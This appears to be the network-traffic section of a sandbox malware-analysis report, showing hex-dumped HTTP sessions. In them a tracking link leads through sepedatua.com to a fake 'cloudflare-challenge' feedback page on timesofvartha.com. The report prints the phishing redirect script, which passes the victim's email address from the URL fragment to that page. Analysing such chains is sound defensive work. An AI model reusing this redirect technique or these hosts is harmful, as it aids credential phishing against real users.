                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                              Content-Length: 4742
                                                                                                                              Host: login.live.com
                                                                                                                              2024-11-18 16:55:32 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                              2024-11-18 16:55:32 UTC569INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                                              Expires: Mon, 18 Nov 2024 16:54:32 GMT
                                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              x-ms-route-info: C529_BL2
                                                                                                                              x-ms-request-id: c8bb66ba-22e0-47f8-a69c-4a94fcf6aa67
                                                                                                                              PPServer: PPV: 30 H: BL02EPF0001D880 V: 0
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:32 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 10197
                                                                                                                              2024-11-18 16:55:32 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.174971834.168.114.704436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:40 UTC864OUTGET /?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect HTTP/1.1
                                                                                                                              Host: r.neurotags.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:40 UTC313INHTTP/1.1 302 Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:40 GMT
                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                              Set-Cookie: B=5299271a.62732c961e0a9; path=/; max-age=630720000; domain=.neurotags.com
                                                                                                                              Location: https://sepedatua.com/158983/secure-redirect
                                                                                                                              Content-Length: 1
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:55:40 UTC1INData Raw: 0a
                                                                                                                              Data Ascii:


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.1749720103.134.152.124436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:42 UTC678OUTGET /158983/secure-redirect HTTP/1.1
                                                                                                                              Host: sepedatua.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:42 UTC393INHTTP/1.1 301 Moved Permanently
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 706
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:42 GMT
                                                                                                                              Server: LiteSpeed
                                                                                                                              Location: https://sepedatua.com/158983/secure-redirect/
                                                                                                                              Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
                                                                                                                              2024-11-18 16:55:42 UTC706INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helve


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.1749722103.134.152.124436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:43 UTC679OUTGET /158983/secure-redirect/ HTTP/1.1
                                                                                                                              Host: sepedatua.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:44 UTC389INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Last-Modified: Mon, 18 Nov 2024 10:56:44 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 248
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:44 GMT
                                                                                                                              Server: LiteSpeed
                                                                                                                              Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
                                                                                                                              2024-11-18 16:55:44 UTC248INData Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6d 79 6c 69 6e 6b 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 69 6d 65 73 6f 66 76 61 72 74 68 61 2e 63 6f 6d 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 2f 23 27 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 72 61 67 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 27 40 27 29 3b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 6d 79 6c 69 6e 6b 20 2b 20 66 72 61 67 6d 65 6e 74 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a
                                                                                                                              Data Ascii: <script> (function() { var mylink = 'https://timesofvartha.com/cloudflare-challenge/#'; var fragment = window.location.hash.substring(1).replace(/\+/g, '@'); window.location.href = mylink + fragment; })();</script>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.1749724208.91.198.814436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:45 UTC700OUTGET /cloudflare-challenge/ HTTP/1.1
                                                                                                                              Host: timesofvartha.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://sepedatua.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:45 UTC208INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:45 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:55:45 UTC1997INData Raw: 37 63 31 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 65 65 64 62 61 63 6b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 22 20 61 73 79 6e 63 20 64
                                                                                                                              Data Ascii: 7c1<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Feedback</title> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async d


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.1749726104.18.95.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:46 UTC545OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:46 UTC386INHTTP/1.1 302 Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:46 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              location: /turnstile/v0/b/22755d9a86c9/api.js
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d73bc76359c-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.1749727104.18.95.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:47 UTC560OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:47 UTC471INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:47 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 47672
                                                                                                                              Connection: close
                                                                                                                              accept-ranges: bytes
                                                                                                                              last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d79cc523ace-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:47 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                              Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                              Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
